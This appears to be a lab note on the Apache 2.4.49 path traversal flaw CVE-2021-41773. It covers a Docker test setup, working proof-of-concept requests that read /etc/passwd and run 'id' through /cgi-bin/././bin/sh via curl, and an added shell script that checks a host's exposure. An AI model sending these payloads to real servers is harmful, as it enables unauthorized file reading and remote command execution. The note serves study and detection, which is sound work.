Affected version: only Apache HTTP Server 2.4.49
Recommended environment: GitHub - blasty/CVE-2021-41773: CVE-2021-41773 playground
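After downloading:
docker-compose build
docker-compose up
If you run into a problem, enter the container to fix it.
Run vim /etc/apache2/apache2.conf and add this as the last line:
ServerName localhost:80
After the change, restart:
apachectl restart
PoC: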
GET /icons//.//./etc/passwd HTTP/1.1
Host: xx.xx.xx:8080
Cache-Control: max-age=0
User-Agent: ... Intel ... like Gecko) Chrome/93.0.4577.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
If-None-Match: "29cd-5cdd3418a72f6-gzip"
If-Modified-Since: Fri, 08 Oct 2021 08:35:04 GMT
Connection: ...

curl --data 'echo; id' 'http://xx.xx.xx.xx:8080/cgi-bin/././bin/sh'

POST /cgi-bin/./bin HTTP/1.1
Host: xx.xx
Note: mod_cgid must be enabled for this to work.
ls /etc/apache2/mods-available/ | grep cgi
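
The page gives two conditions: the bug exists only in 2.4.49, and the command-execution PoC additionally needs mod_cgid. The following added example (not part of the original page or the playground repository) turns those two conditions into a host check. It assumes the usual output formats of apachectl -v and apachectl -M; the function names and sample values are constructed for illustration.

```shell
#!/bin/sh
# Added example: classify a host's exposure to CVE-2021-41773 from the
# output of `apachectl -v` (version banner) and `apachectl -M` (loaded
# modules). Inputs are passed as strings so the logic can be checked offline.

# Extract "2.4.49" from a banner such as "Server version: Apache/2.4.49 (Unix)".
apache_version() {
    printf '%s\n' "$1" | sed -n 's|.*Apache/\([0-9][0-9.]*\).*|\1|p' | head -n 1
}

# Succeed if the loaded-module list contains cgi_module or cgid_module.
# Anchoring at line start avoids false hits such as proxy_fcgi_module.
cgi_loaded() {
    printf '%s\n' "$1" | grep -Eq '^[[:space:]]*cgid?_module([[:space:]]|$)'
}

# Print one of: unknown, not-affected, file-read, file-read+rce.
# "not-affected" refers to this CVE only (the page: 2.4.49 is the only
# affected release). Whether files are actually readable also depends on
# the Directory access rules in the running configuration.
classify_exposure() {
    ver=$(apache_version "$1")
    [ -n "$ver" ] || { echo unknown; return; }
    [ "$ver" = "2.4.49" ] || { echo not-affected; return; }
    if cgi_loaded "$2"; then
        echo file-read+rce
    else
        echo file-read
    fi
}

# Constructed sample output (not captured from a real host).
SAMPLE_BANNER='Server version: Apache/2.4.49 (Unix)'
SAMPLE_MODULES='Loaded Modules:
 core_module (static)
 proxy_fcgi_module (shared)
 cgid_module (shared)'

classify_exposure "$SAMPLE_BANNER" "$SAMPLE_MODULES"

# On a real host:
#   classify_exposure "$(apachectl -v)" "$(apachectl -M 2>/dev/null)"
```

The mods-available directory only shows which modules are installed; apachectl -M reports the modules the running configuration actually loads, which is what determines exposure.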
Reference: CVE-2021-41773 follow-up: an in-depth analysis of escalating the Apache HTTP Server path traversal vulnerability to RCE with echoed output